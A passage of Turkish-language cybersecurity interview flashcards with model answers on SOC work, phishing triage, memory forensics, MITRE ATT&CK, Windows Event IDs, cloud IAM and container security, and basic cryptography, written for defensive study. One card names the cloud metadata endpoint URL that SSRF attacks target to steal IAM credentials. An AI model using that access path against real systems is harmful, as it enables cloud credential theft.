  • Log bütünlüğü — değiştirilmemiş olması (WORM storage)
  • Merkezi toplanmış log — tek kaynak of truth
Analiz odakları:
  • Authentication eventleri (başarı/başarısızlık)
  • Privilege escalation aktivitesi
  • Network bağlantıları (özellikle outbound)
  • Process execution (özellikle script engine, LOLbins)
  • File system değişiklikleri
Araç: Splunk, ELK Stack, Graylog
NTP senkronWORM storageAuthenticationProcess executionKorelasyon

Bir phishing email geldiğinde triage süreci nasıl olmalı?

Email analizi:
  • Header analizi: gerçek gönderen IP, SPF/DKIM/DMARC durumu
  • Bağlantılar: URLScan.io, VirusTotal ile kontrol
  • Ekler: sandbox (Any.run, Joe Sandbox) ile analiz
  • Kimlik sahteciliği var mı? Domain lookalike?
Etki değerlendirmesi:
  • Kaç kullanıcı aldı?
  • Bağlantıya tıklayan var mı? (proxy log)
  • Credential girildi mi?
Aksiyon:
  • Email kutularından geri çek (EAC/PowerShell)
  • Tıklayan kullanıcıların parolasını sıfırla
  • C2 IP/domain'i firewall/proxy'de blokla
Header analiziSPF/DKIM/DMARCURLScanSandboxGeri çekme

Chain of custody nedir? Forensics'te neden önemlidir?

Dijital kanıtın ilk tespitten mahkeme sürecine kadar kim tarafından, ne zaman, nasıl ele alındığının kayıt altına alınmasıdır.

Önemli çünkü:
  • Kanıtın bütünlüğünü (integrity) ispat eder
  • Değiştirilmediğini gösterir
  • Mahkemede kabul edilebilir olması için zorunludur
Best practices:
  • Disk imajı al, orijinale dokunma
  • Hash (SHA-256) al, imajda doğrula
  • Her aksiyonu belgele (tarih/saat/kişi)
  • Write blocker kullan
  • Zinciri kesme — her transferi kaydet
Kanıt bütünlüğüSHA-256 hashWrite blockerMahkemeDokümantasyon

Volatility / memory forensics nedir?

Çalışan bir sistemin RAM içeriğini analiz ederek gizlenmiş süreçler, ağ bağlantıları, şifreler ve malware kalıntıları bulmak.

Volatility framework komutları (v3):
  • windows.pslist – Süreç listesi
  • windows.netscan – Ağ bağlantıları
  • windows.malfind – Şüpheli inject edilmiş kod
  • windows.cmdline – Process komut satırları
  • windows.dlllist – Yüklenmiş DLL'ler
Memory dump alma: WinPmem, DumpIt, FTK Imager (Live RAM)

Neden önemli: Disk'e yazılmamış malware (fileless), şifreler, aktif C2 bağlantıları sadece RAM'de olur.
VolatilitymalfindpslistFileless malwareRAM dump

Purple team nedir?

Red team (saldırı) ile blue team (savunma) arasındaki iş birliğini artırmak için çalışan yaklaşım veya ekiptir.

Klasik model: Red ve Blue ayrı çalışır → Red saldırır, Blue savunur, az bilgi paylaşımı.

Purple Team modeli: Red ve Blue birlikte çalışır. Red bir teknik dener, Blue hemen "bunu tespit edebildim mi?" diye bakar. Açıklar anlık kapatılır.

Faydaları:
  • Hızlı geri bildirim döngüsü
  • Tespit kuralları iyileşir
  • Her iki ekip de öğrenir
Araç: MITRE ATT&CK Evaluations, Atomic Red Team
Red+Blue işbirliğiGeri bildirim döngüsüAtomic Red TeamTespit iyileştirme

Threat intelligence nedir? Stratejik, taktiksel, operasyonel farkı?

Threat intelligence: Tehdit aktörleri, TTP'ler ve IOC'ler hakkında bağlamsal, analiz edilmiş bilgi.

Katmanlar:
  • Stratejik: Yönetim seviyesi. "Sektörümüzü hedef alan APT grupları kimler?" Karar vericiler için.
  • Operasyonel: Kampanya detayları. "Bu APT şu ay şu hedeflere saldırıyor, TTK kullanıyor." SOC ve IR ekipleri için.
  • Taktiksel: Teknik detay. IOC'ler: IP, hash, domain, YARA kuralı. Araçlara direkt beslenebilir.
Kaynaklar: MISP, OpenCTI, VirusTotal, Mandiant Advantage, ISAC'lar
Stratejik/operasyonel/taktikselIOC feedMISPISACAPT profil

Linux sistemlerde hangi log dosyaları önemlidir?

  • /var/log/auth.log (Debian) / /var/log/secure (RHEL): SSH login, sudo kullanımı, PAM olayları
  • /var/log/syslog / /var/log/messages: Genel sistem logları
  • /var/log/kern.log: Kernel mesajları (rootkit tespiti için)
  • /var/log/cron: Cron job aktivitesi
  • /var/log/apache2/ veya nginx/: Web sunucu access/error logları
  • /var/log/audit/audit.log: Auditd — sistemleme syscall seviyesi izleme
Önemli komutlar: last, lastb, who, w, history (manipüle edilebilir)
auth.logaudit.log/var/log/secureauditdlast/lastb

Bir iç tehdit (insider threat) olayını nasıl tespit edersiniz?

Tipik insider threat göstergeleri:
  • Çalışma saatleri dışında sisteme erişim
  • Normalde erişmediği dosya/veri tabanlarına erişim
  • Büyük miktarda veri indirme veya USB'ye kopyalama (DLP alert)
  • Yetki olmadığı halde ayrıcalıklı komutlar çalıştırma
  • İşten ayrılma döneminde artan veri erişimi
  • VPN veya uzak masaüstü alışılmadık zamanlarda
Tespit araçları:
  • UEBA (User and Entity Behavior Analytics): Kullanıcı davranış baseline'ından sapma
  • DLP (Data Loss Prevention): Hassas veri çıkışını izleme
  • PAM (Privileged Access Management): Admin hesap izleme
UEBADLPAnormal erişimİşten ayrılma dönemiPAM

MITRE ATT&CK framework nedir?

Gerçek dünya saldırılarından derlenen, saldırgan taktik ve tekniklerini kategorize eden bilgi tabanıdır. MITRE Corporation tarafından geliştirilmiş ve sürekli güncellenmektedir.

Yapısı:
  • Tactics (14): Saldırganın amacı — Reconnaissance, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Command & Control, Impact...
  • Techniques: Her taktiği gerçekleştirme yöntemi (200+)
  • Sub-techniques: Tekniğin daha spesifik varyantları
Blue team kullanımı: Detection engineering, threat hunting, purple team egzersizleri, SOC coverage gap analizi.
14 taktikTeknik/alt teknikDetection engineeringThreat huntingPurple team

Incident Response süreci adımları nelerdir?

NIST SP 800-61 çerçevesine göre 4 ana aşama:
  1. Preparation (Hazırlık): IR planı, playbook'lar, araçlar, ekip eğitimi. Olay olmadan önce yapılır.
  2. Detection & Analysis (Tespit & Analiz): Olayı tespit et, doğrula, sınıflandır, kapsam belirle. Log analizi, IOC araştırması.
  3. Containment, Eradication & Recovery (Sınırlama, Temizlik, Kurtarma): Yayılmayı durdur → kötü amaçlı unsurları temizle → sistemi restore et → izlemeye devam et.
  4. Post-Incident Activity (Olay Sonrası): Lessons learned, raporlama, süreç iyileştirme.
Önemli: Containment öncesi adli delil toplama (forensic image) kritiktir.
NIST SP 800-61ContainmentEradicationLessons learnedForensic image

Threat hunting nedir? Reaktif güvenlikten farkı nedir?

Threat hunting: Sistemde halihazırda var olabilecek ama henüz tespit edilmemiş tehditleri proaktif olarak arama sürecidir.

Reaktif güvenlik: Alarm geldiğinde müdahale edilir. Sorun: Sofistike saldırganlar alarm üretmeden hareket eder.

Threat hunting döngüsü:
  1. Hipotez oluştur (MITRE ATT&CK'tan) — "Saldırgan PowerShell'i kullanıyor olabilir"
  2. Log/veri araştır
  3. Bulguları analiz et
  4. Tespit ise respond et; değilse detection rule olarak kaydet
Gereksinimler: Zengin log verisi (EDR, network flow, DNS), analitik yetkinlik, MITRE bilgisi.
ProaktifHipotez bazlıEDR loguMITRE ATT&CKDetection gap

IOC ve IOA arasındaki fark nedir?

IOC (Indicator of Compromise — Uzlaşma Göstergesi): Bir sistemin ele geçirildiğine dair reaktif kanıtlar. Saldırı gerçekleştikten sonra tespit edilir.

IOC örnekleri: Bilinen zararlı IP/domain, hash değeri, registry key, mutex adı

IOA (Indicator of Attack — Saldırı Göstergesi): Saldırganın amacını ve davranışını gösteren proaktif sinyaller. Saldırı devam ederken tespit mümkün.

IOA örnekleri: Yönetici araçlarının alışılmadık kullanımı, lateral movement pattern, credential dumping davranışı

Neden önemli: IOC'lar kolayca değiştirilebilir (hash, IP). IOA davranış bazlıdır — kaçınmak çok daha zordur.
Reaktif vs proaktifDavranış bazlıHashIP/domainEDR

Windows Event Log'larında hangi Event ID'ler kritiktir?

SOC analistinin ezberlemesi gereken kritik Windows Event ID'leri:

Kimlik Doğrulama:
  • 4624 — Başarılı giriş
  • 4625 — Başarısız giriş (brute force tespiti)
  • 4648 — Explicit credential ile giriş (PtH belirtisi olabilir)
  • 4768/4769 — Kerberos TGT/TGS isteği (Kerberoasting tespiti)
Yetki & Hesap:
  • 4720 — Yeni kullanıcı oluşturma
  • 4728/4732 — Gruba üye ekleme
  • 4672 — Admin yetkisiyle oturum
Süreç:
  • 4688 — Yeni süreç oluşturma (komut satırı logla)
  • 7045 — Yeni servis kurulumu
462446254688KerberoastingBrute force tespiti

Dijital adli analizde (forensics) chain of custody nedir?

Dijital delillerin toplanmasından davaya kadar geçen süreçte delillerin bütünlüğünü ve güvenilirliğini kanıtlayan belgeleme zinciridir.

Neden kritik: Zincir kırılırsa delil mahkemede kabul edilmez. Savunma avukatı "delil manipüle edilmiş olabilir" argümanı kullanır.

Uygulamada:
  • Delil toplandığında hash (SHA-256) al, imzala
  • Fiziksel mühürlü torba, etiket
  • Kim aldı, ne zaman, nerede — her transfer kayıt altında
  • Write blocker kullanarak orijinal medyaya asla yazma
  • Analizler kopya (forensic image) üzerinde yapılır
Hash bütünlüğüWrite blockerForensic imageMahkeme deliliSHA-256

Cloud

Shared responsibility model nedir?

Cloud provider sorumluluğu (security OF the cloud): Fiziksel altyapı, hypervisor, ağ donanımı

Müşteri sorumluluğu (security IN the cloud): Veriler, IAM, uygulamalar, OS (IaaS'ta), ağ konfigürasyonu

Servis modeline göre değişir:
  • IaaS: Müşteri daha fazla sorumluluk
  • PaaS: Orta seviye
  • SaaS: Provider daha fazla sorumluluk
Security OF vs INIaaS/PaaS/SaaSIAM müşteri sorumluluğu

IAM best practices nelerdir?

  • Root account'u kilitli tut, MFA ekle, asla günlük kullanma
  • Her kullanıcı/servise least privilege uygula
  • Uzun süreli access key kullanma → IAM role kullan
  • Kullanılmayan hesap/key'leri kaldır
  • CloudTrail ile tüm API çağrılarını logla
  • SCPs ile organizasyon seviyesinde sınır koy
  • Just-in-time (JIT) access — gerektiğinde onaylı erişim
Root lockLeast privilegeIAM role vs access keyCloudTrailJIT

S3 bucket misconfiguration neden ciddi bir risktir?

S3 bucket'lar yanlış ACL veya bucket policy ile herkese açık hale gelebilir.

Gerçek vakalar: Capital One (100M müşteri verisi), Pentagon sızıntıları

Riskler:
  • Hassas veri (PII, finansal kayıtlar) sızdırma
  • Bucket yazılabilirse webshell yükleme
Tespit: Scout Suite, Prowler, AWS Config, Macie
Önlem: S3 Block Public Access, bucket policy review
Public ACLCapital OneBlock Public AccessMacieProwler

Container güvenliği: Docker ve Kubernetes'te riskler nelerdir?

Docker:
  • Privileged container (root ile çalışma)
  • Zayıf base image
  • Docker socket mount → host'a erişim
  • Hardcoded secret'lar
Kubernetes:
  • RBAC yanlış yapılandırması
  • Default service account token'larının aşırı yetkili olması
  • Etcd şifresiz → tüm cluster secret'ları açık
  • Network policy yokluğu
Araçlar: Falco, Trivy, kube-bench
Privileged containerRBACEtcd şifrelemeFalcoTrivy

Cloud'da en yaygın güvenlik hataları nelerdir?

  • Public S3 bucket
  • Aşırı geniş IAM politikaları ("AdministratorAccess" herkese)
  • Security Group 0.0.0.0/0 her porta açık
  • Şifresiz EBS volume, RDS, S3
  • GitHub'a commit edilmiş AWS key
  • CloudTrail kapalı
  • Eski yama yapılmamış instance'lar
Public S30.0.0.0/0Hardcoded keyLogging kapalı

AWS / Azure / GCP'de shared responsibility model nedir?

Bulut güvenliğinin kimin sorumluluğunda olduğunu tanımlayan modeldir.

Cloud provider sorumluluğu (security OF the cloud): Fiziksel altyapı, hypervisor, ağ donanımı, veri merkezi güvenliği

Müşteri sorumluluğu (security IN the cloud): Veriler, kimlik yönetimi (IAM), uygulamalar, işletim sistemi (IaaS'ta), ağ konfigürasyonu, şifreleme

Servis modeline göre değişir:
  • IaaS: Müşteri daha fazla kontrolde, daha fazla sorumluluk
  • PaaS: Orta seviye
  • SaaS: Provider daha fazla sorumluluk
Security OF vs INIaaS/PaaS/SaaS farkıIAM müşteri sorumluluğu

IAM (Identity and Access Management) best practices nelerdir?

  • Root account'u kilitli tut, MFA ekle, asla günlük kullanma
  • Her kullanıcıya/servise least privilege uygula
  • Uzun süreli erişim anahtarları (access keys) kullanma → IAM role kullan
  • Kullanılmayan hesap/key'leri düzenli kaldır
  • SCPs (Service Control Policies) ile organizasyon seviyesinde sınır koy
  • CloudTrail ile tüm API çağrılarını logla
  • Permission boundary kullan
  • Privileged Identity Management (PIM) — just-in-time access
Root lockLeast privilegeIAM role vs access keyCloudTrailJIT access

Cloud forensics neden zorudur?

  • Geçicilik: Serverless, container gibi kaynaklar kısa ömürlüdür; terminate olunca log/veri kaybolabilir
  • Paylaşımlı altyapı: Hipervisor seviyesi görünürlük yok
  • Log sınırlamaları: Default olarak açık değildir, saklama süresi kısıtlı
  • Çok bölgeli veri: Veriler farklı ülkelerde → yetki alanı (jurisdiction) sorunları
  • Sağlayıcı işbirliği gerekiyor: Fiziksel erişim yok, disk imajı alamazsın
  • API log'ları: CloudTrail, Azure Monitor kapalıysa hiçbir iz yok
Best practice: Immutable logging, SIEM'e stream et, log retention policy belirle.
Geçici kaynaklarJurisdictionCloudTrail şartLog retentionSağlayıcı işbirliği

CSPM (Cloud Security Posture Management) nedir?

Bulut ortamındaki güvenlik yapılandırma hatalarını otomatik olarak tespit eden ve düzelten araç kategorisidir.

Yetenekler:
  • CIS Benchmark, NIST, PCI-DSS gibi frameworklerle uyumluluk kontrolü
  • Yanlış yapılandırma tespiti (public S3, open security groups vb.)
  • Drift detection (standart yapılandırmadan sapma)
  • Auto-remediation (otomatik düzeltme)
  • Multi-cloud görünürlük
Ürünler: Prisma Cloud, Wiz, Orca Security, AWS Security Hub, Microsoft Defender for Cloud
Yanlış yapılandırmaCIS BenchmarkDrift detectionWizPrisma Cloud

Zero Trust'ı cloud ortamında nasıl uygularsınız?

  • Kimlik merkezli erişim: Her API çağrısı, her servis iletişimi kimlik doğrulama gerektirmeli
  • Mikro-segmentasyon: Servisler arası trafik için explicit network policy
  • Just-in-time (JIT) erişim: Kalıcı admin yetkisi yok, gerektiğinde onaylı erişim
  • Device posture: Sadece uyumlu (compliant) cihazlardan erişim
  • Continuous verification: Her istekte re-authentication / risk scoring
  • Encryption everywhere: Servisler arası mTLS
Araçlar: BeyondCorp (Google), Azure AD Conditional Access, Istio (service mesh)
JIT erişimmTLSMikro-segmentasyonConditional AccessBeyondCorp

Shared Responsibility Model nedir?

Bulut güvenliğinin "kimin neyi koruduğunu" belirleyen temel çerçevedir. AWS, Azure ve GCP'nin hepsi bu modeli kullanır.

Genel kural:
  • CSP (Bulut sağlayıcı): "Bulutun güvenliği" — fiziksel altyapı, hypervisor, ağ, veri merkezi
  • Müşteri: "Buluttaki güvenlik" — veri, kimlik, uygulama, ağ yapılandırması, şifreleme
Servis modeline göre değişir:
  • IaaS (EC2): Müşteri sorumluluğu en fazla — OS, runtime, uygulama, veri
  • PaaS (RDS): CSP OS ve runtime'ı üstlenir
  • SaaS (Office 365): CSP neredeyse her şeyi yönetir, müşteri sadece veri ve erişimi
CSP sorumluluğuMüşteri sorumluluğuIaaS/PaaS/SaaSVeri korumaYanlış anlama riski

Container güvenliğinde dikkat edilmesi gerekenler nelerdir?

Image güvenliği:
  • Resmi/minimal base image kullan (alpine, distroless)
  • Image'leri zafiyet tarayıcısıyla tara (Trivy, Snyk, Grype)
  • Image'leri imzala (Docker Content Trust, Sigstore/Cosign)
Runtime güvenliği:
  • Container'ı root olarak çalıştırma — non-root user belirt
  • Read-only filesystem kullan
  • Privileged mode'dan kaçın
  • Resource limit belirle (CPU/memory)
Kubernetes özelinde:
  • RBAC doğru yapılandır
  • Network Policy ile pod-to-pod iletişimi kısıtla
  • Secrets'ı environment variable olarak değil, Kubernetes Secrets veya Vault ile yönet
  • Pod Security Standards uygula
TrivyNon-rootRBACNetwork PolicyImage imzalama

Cloud ortamında IAM en iyi pratikleri nelerdir?

Temel prensipler:
  • Least Privilege: Sadece gereken izni ver, ne fazla ne az
  • MFA zorunlu: Özellikle root/admin hesaplarda mutlaka aktif
  • Root hesabı kullanma: AWS root sadece ilk kurulum için — hemen sonra kilitle
Pratik önlemler:
  • Access key'leri rotasyona sok (90 gün)
  • Kullanılmayan hesap ve rolleri sil
  • IAM Access Analyzer ile aşırı izinleri tespit et
  • Service account'lara role-based access (insan kullanıcısı gibi davranma)
  • SCPs (Service Control Policies) ile organizasyon genelinde guardrail koy
Tespit: CloudTrail ile tüm API çağrılarını logla ve anomali izle.
Root hesapMFALeast privilegeAccess key rotasyonuCloudTrail

SSRF (Server-Side Request Forgery) bulut ortamında neden özellikle tehlikelidir?

SSRF, saldırganın sunucuyu aracı olarak kullanarak iç kaynaklara istek yaptırmasıdır. Bulut ortamında bu çok daha kritiktir çünkü:

Cloud metadata API'si riski: AWS, GCP, Azure'da her instance'ın erişebildiği bir metadata endpoint vardır:
http://169.254.169.254/latest/meta-data/

Bu endpoint üzerinden:
  • Instance IAM role'ünün geçici credential'ları alınabilir
  • Bu credential'larla S3, EC2, RDS gibi servislere erişilebilir
  • Şirketin tüm bulut altyapısı tehlikeye girebilir
Gerçek örnek: 2019 Capital One ihlali — AWS SSRF üzerinden 100M+ müşteri verisi çalındı.
Önlem: IMDSv2 (token bazlı), egress filtering, WAF.
Metadata API169.254.169.254IMDSv2Capital OneIAM credential çalınması

CSPM nedir? CWPP ile farkı nedir?

CSPM (Cloud Security Posture Management): Bulut altyapısının yanlış yapılandırmalarını sürekli tarayıp tespit eden araçtır.

Kontrol ettiği şeyler: S3 bucket herkese açık mı? MFA aktif mi? Şifreleme yapılandırılmış mı? Security group'lar gereksiz yere 0.0.0.0/0 açık mı?

CWPP (Cloud Workload Protection Platform): Çalışan iş yüklerini (VM, container, serverless) runtime'da koruyan platformdur. Antivirüs, EDR, vulnerability assessment fonksiyonlarını buluta taşır.

Özet: CSPM = "altyapın güvenli yapılandırılmış mı?" · CWPP = "çalışan iş yüklerin güvende mi?"

Araçlar: Wiz, Prisma Cloud, AWS Security Hub, Defender for Cloud
Yanlış yapılandırmaS3 bucket açıkRuntime korumaWizPrisma Cloud

Multi-account / landing zone yaklaşımı cloud güvenliğinde neden önemlidir?

Kurumsal bulutta tüm iş yüklerini tek hesapta toplamak yerine prod, test, security, log archive ve sandbox gibi ayrı hesaplara bölmek güvenlik ve yönetişim açısından çok daha sağlıklıdır.

Neden önemli:
  • Blast radius küçülür: Bir hesabın compromise olması tüm organizasyonu etkilemez
  • Ayrı sorumluluk alanları oluşur: Geliştirme ve üretim net ayrılır
  • Merkezi loglama ve denetim kolaylaşır: Güvenlik hesabında değiştirilemez log arşivi tutulabilir
  • Guardrail uygulanır: SCP, tag policy ve network standardı organizasyon seviyesinde zorlanır
İyi tasarım: Kimlik merkezi, merkezi denetim hesabı, ayrı log archive, paylaşılan servis hesabı ve net naming/tagging standardı.
Landing zoneMulti-accountBlast radiusLog archiveSCP guardrail

KMS ve envelope encryption nedir? Cloud ortamında neden önemlidir?

KMS (Key Management Service): Şifreleme anahtarlarının güvenli oluşturulmasını, saklanmasını, rotasyonunu ve erişim kontrolünü yöneten hizmettir.

Envelope encryption: Veriyi doğrudan master key ile değil, bir data key ile şifrelersin. Data key ise KMS içindeki anahtar ile ayrıca şifrelenir.

Avantajları:
  • Büyük veri setlerinde performanslıdır
  • Master key dışarı çıkmaz
  • Kim hangi anahtarı kullandı izlenebilir
  • Key rotation daha yönetilebilir hale gelir
Mülakatta beklenen nokta: "Şifreleme açık mı?" kadar "anahtarı kim yönetiyor, erişim nasıl denetleniyor, log’u var mı?" sorularını da düşünmek gerekir.
KMSEnvelope encryptionData keyKey rotationAudit trail

Cloud incident response sırasında ilk hangi log ve kontrol noktalarına bakarsın?

Bulutta olay müdahalesi çoğu zaman host erişiminden önce kontrol düzlemi loglarıyla başlar.

İlk bakılacak yerler:
  • CloudTrail / Activity Log: Kim, hangi API çağrısını, ne zaman yaptı?
  • IAM değişiklikleri: Yeni kullanıcı, role assumption, policy değişikliği, access key oluşturma
  • Ağ kayıtları: VPC Flow Logs, NSG Flow Logs, load balancer access log
  • Storage erişimi: S3 data event, object access log, blob erişimleri
  • Config / Asset snapshot: Hangi güvenlik grubu veya policy sonradan değişti?
İyi yaklaşım: Önce etki alanını çıkar, sonra credential abuse mı, misconfiguration mı, workload compromise mı ayır. Bulutta containment çoğu zaman instance kapatmaktan önce erişim anahtarı/role kontrolüyle başlar.
CloudTrailIAM değişikliğiVPC Flow LogsEtki alanıCredential abuse

CloudTrail management event ile data event arasındaki fark nedir?

Management event: Kontrol düzlemindeki API çağrılarıdır. Örneğin kullanıcı oluşturma, policy değiştirme, security group güncelleme, bucket policy güncelleme gibi işlemleri gösterir.

Data event: Verinin kendisine erişimi gösterir. Örneğin S3 object okuma/yazma, Lambda invoke, belirli veri düzlemi işlemleri bu kapsamdadır.

Neden önemli: Sadece management event açık ise "bucket policy kim değiştirdi?" sorusunu görürsün ama "hangi object gerçekten okundu?" sorusuna cevap veremezsin. Olay müdahalesinde ikisi birlikte anlamlıdır. Data event daha ayrıntılıdır ama maliyeti ve veri hacmi daha yüksektir.
Management eventData eventControl planeS3 object accessOlay müdahalesi görünürlüğü

Security Group ile NACL arasındaki fark nedir?

Security Group: Instance veya ENI seviyesinde çalışan sanal firewall’dır. Stateful çalışır; izin verilen bir bağlantının dönüş trafiği ayrıca kural yazmadan geçer.

NACL (Network ACL): Subnet seviyesinde çalışan filtre katmanıdır. Stateless çalışır; giriş ve çıkış kuralları ayrı tanımlanır ve dönüş trafiği için de açık kural gerekir.

Pratik fark: Security Group daha uygulama yakın ve sık kullanılan kontrol noktasıdır. NACL ise kaba ağ sınırı ve ek savunma katmanı için uygundur.

Mülakatta beklenen nokta: Statefulness farkını net söylemek ve "deny" mantığının NACL’de açıkça yazılabildiğini bilmek önemlidir.
Security Group statefulNACL statelessSubnet seviyesiDeny kuralıKatmanlı ağ kontrolü

Cloud ortamında secret yönetimini nasıl yaparsın? Ne yapılmamalı?

Yapılmaması gerekenler:
  • Secret’ı source code içine koymak
  • Container image içine gömmek
  • Uzun ömürlü access key’leri environment variable’da kontrolsüz bırakmak
  • Chat, wiki veya ticket içine düz metin secret kopyalamak
Doğru yaklaşım:
  • AWS Secrets Manager, Azure Key Vault, GCP Secret Manager gibi merkezi bir kasa kullan
  • Erişimi role tabanlı ver, uygulama secret’ı runtime’da çekebilsin
  • Rotation mümkünse otomatik olsun
  • Secret erişimini logla ve alarm üret
  • Uygulama tarafında least privilege ile sadece gereken secret’a erişim ver
İyi cevap secret yönetimini sadece saklama değil, erişim kontrolü, rotasyon ve izlenebilirlik olarak ele almalıdır.
Secrets ManagerKey VaultRotationRBAC erişimSource code içine koymamak

Cross-account role assumption nedir ve güvenli nasıl uygulanır?

Bir hesabın, başka bir hesaptaki role geçici olarak `assume` ederek yetki almasıdır. Kurumsal bulutta merkezi güvenlik hesabı, denetim hesabı veya deployment hesabı için çok kullanılır.

Güvenli uygulama:
  • Kalıcı access key yerine geçici STS credential kullan
  • Trust policy’yi dar tut: sadece belirli principal, belirli hesap veya belirli koşul
  • External ID veya condition kullanarak confused deputy riskini azalt
  • Role session süresini gereksiz uzun tutma
  • CloudTrail’de assume role izlerini takip et
Risk: Trust policy aşırı genişse başka hesaplar veya beklenmeyen servisler role geçebilir. Bu yüzden kim role geçebilir, ne yapabilir ve ne kadar süre yapabilir net sınırlandırılmalıdır.
AssumeRoleSTS credentialTrust policyExternal IDCloudTrail izleme

S3 pre-signed URL kullanırken hangi güvenlik risklerini düşünmelisin?

Pre-signed URL, belirli süre boyunca belirli objeye imzalı erişim veren geçici bağlantıdır. Doğru kullanılırsa faydalıdır ama kontrolsüz kullanılırsa veri sızıntısına dönüşebilir.

Riskler:
  • Süre çok uzunsa URL ele geçirildiğinde herkes kullanabilir
  • Log, e-posta veya referer içinde sızabilir
  • Yanlış HTTP method ile gereğinden fazla yetki verilebilir
  • Geniş path veya upload izni ile kötüye kullanım olabilir
Güvenli kullanım:
  • Kısa süreli üret
  • Tek object ve tek method ile sınırla
  • Gerekirse content-type veya content-length koşulu ekle
  • Hassas objelerde ek kontrol katmanı düşün
Mülakatta iyi cevap pre-signed URL’yi "public link değil, kontrollü ama yine de paylaşılabilir bir erişim token’ı" olarak tanımlar.
Pre-signed URLKısa süreMethod kısıtıVeri sızıntısıGeçici erişim tokenı

Serverless fonksiyonlarda en yaygın güvenlik riskleri nelerdir?

Serverless güvenliği "sunucu yok" diye kolaylaşmaz; sadece risk şekli değişir.

Başlıca riskler:
  • Aşırı geniş IAM role
  • Environment variable içinde secret sızıntısı
  • Bağımlılık zinciri ve vulnerable package riski
  • İzolasyon varsayımına aşırı güven
  • Trigger yüzeyinin büyümesi: API Gateway, queue, event source
  • Yetersiz loglama ve kısa yaşam süresi nedeniyle forensics zorluğu
Kontroller:
  • Fonksiyon başına dar yetki ver
  • Secret’ı vault üzerinden çek
  • Dependency scanning yap
  • Timeout, concurrency ve input validation uygula
  • Detaylı invocation logu tut
Aşırı geniş roleEnvironment secretDependency riskiInput validationServerless forensics

Cloud’da güvenli yedekleme stratejisi nasıl tasarlanmalı?

Bulutta snapshot almak tek başına yeterli değildir. Yedekleme stratejisi, erişim kontrolü ve değiştirilemezlik birlikte düşünülmelidir.

İyi tasarım unsurları:
  • 3-2-1 mantığını buluta uyarlamak: farklı hesap, farklı bölge veya farklı servis kopyası
  • Backup hesabını üretim hesabından ayırmak
  • Silinemez / immutable backup özelliği kullanmak
  • Yedekleri şifrelemek ve anahtar erişimini sınırlamak
  • Restore testi yapmak; backup var ama dönülemiyorsa işe yaramaz
Ransomware açısından kritik nokta: Saldırgan üretim kimliğiyle backup’ı da silebiliyorsa tasarım zayıftır. Bu yüzden ayrı hesap, ayrı role ve delete protection önemli hale gelir.
Immutable backupRestore testiAyrı hesapŞifreli backupRansomware dayanıklılığı

VPC endpoint veya private endpoint kullanmak ne avantaj sağlar?

Bu yapı sayesinde bulut servislerine internet üzerinden değil, sağlayıcının omurgası içinden özel bağlantıyla erişirsin. Örneğin uygulaman S3, Secrets Manager veya Key Vault’a NAT üzerinden internete çıkmadan bağlanabilir.

Avantajlar:
  • Egress yüzeyi küçülür
  • Veri trafiği interneti görmez
  • Daha sıkı ağ politikası uygulanabilir
  • Hassas servis erişimleri için daha kontrollü mimari kurulur
Mülakatta beklenen nokta: "Private endpoint = sadece performans değil, veri sızıntısı ve ağ sertleştirme açısından da önemli" diyebilmek gerekir. Özellikle regülasyonlu ortamlarda internete çıkmadan servis tüketmek ciddi artıdır.
Private endpointEgress azaltmaİnternete çıkmadan erişimAğ sertleştirmeBulut omurgası

Cloud detection engineering yaparken hangi use-case’lerden başlarsın?

İlk aşamada teorik her şeyi değil, kötüye kullanımı en sık ve etkisi yüksek olan aktiviteleri hedeflersin.

Başlangıç use-case’leri:
  • İmkânsız seyahat veya anormal konsol girişi
  • MFA kapatma veya root/admin hesap değişikliği
  • Yeni access key oluşturma
  • Policy’yi aşırı genişleten IAM değişikliği
  • Public exposure: bucket policy veya security group değişimi
  • CloudTrail/logging kapatma girişimi
  • Şüpheli bölgede yeni instance / crypto miner paterni
İyi yaklaşım: Her alarm için veri kaynağı, false positive ihtimali, aksiyon planı ve owner belirlenir. Alarm üretmek kadar gürültüyü yönetmek de detection engineering’in parçasıdır.
Detection use-caseMFA kapatmaIAM değişikliğiLogging kapatmaFalse positive yönetimi

Infrastructure as Code (IaC) güvenlik açısından neden kritiktir?

IaC, bulut altyapısını kod gibi tanımlamayı sağlar. Bu yaklaşım güvenliği sonradan düzeltmek yerine tasarım aşamasında zorlamayı mümkün kılar.

Neden kritik:
  • Yapılandırma tekrar üretilebilir olur
  • Code review ile güvenlik hataları daha deploy olmadan yakalanır
  • Policy-as-code ile yanlış ayarları CI/CD’de bloklayabilirsin
  • Drift detection ile üretimde manuel değişiklikleri yakalayabilirsin
Araç örnekleri: Terraform, CloudFormation, Bicep, Checkov, tfsec, OPA/Conftest

İyi cevap IaC’yi sadece "otomasyon" değil, güvenlik standardizasyonu ve denetlenebilirlik aracı olarak konumlandırmalıdır.
IaCPolicy as codeCheckov/tfsecDrift detectionCode review ile güvenlik

Crypto

Simetrik şifreleme algoritmaları: AES, DES, 3DES farkları

DES (Data Encryption Standard): 56-bit anahtar. 1977'de standart oldu. 1999'da brute-force ile kırıldı. Kullanılmamalı.

3DES (Triple DES): DES'i 3 kez uygular, 112-168 bit güvenlik. DES'in geçici yaması. Yavaş. 2023'te NIST resmi olarak devre dışı bıraktı.

AES (Advanced Encryption Standard): Rijndael algoritması. 128/192/256-bit anahtar. Günümüz standardı. AES-256 militer grade güvenlik.
Block size: 128 bit, SPN (Substitution-Permutation Network) yapısı.
DES kırıkAES-256 standartBlock cipher128/192/256 bit

RSA ve ECC nasıl çalışır?

RSA: Büyük sayıların çarpanlarına ayrılmasının zorluğuna dayanır. 2048-bit minimum. Nispeten yavaş.

ECC: Eliptik eğri ayrık logaritma problemine dayanır. 256-bit ECC ≈ 3072-bit RSA güvenliği. Çok daha hızlı ve küçük anahtar.

Kullanım: TLS 1.3'te ECDHE, ECDSA imza, mobil cihazlar.
RSA factoringECC 256≈RSA 3072ECDHEECDSA

Hash fonksiyonu nedir? MD5, SHA-1, SHA-256 güvenlik farkları?

Hash fonksiyonu, değişken uzunluklu girdiyi sabit uzunluklu çıktıya dönüştürür. Tek yönlü, deterministik.

Özellikler: Pre-image resistance, second pre-image resistance, collision resistance

MD5 (128-bit): Collision saldırısı mümkün (2004'ten beri). Güvenlik için kullanılmamalı, sadece checksum için.

SHA-1 (160-bit): 2017'de Google SHAttered projesiyle collision üretildi. Güvensiz.

SHA-256 (256-bit): SHA-2 ailesinden, hâlâ güvenli. Dijital imza, sertifika, blockchain'de standart.

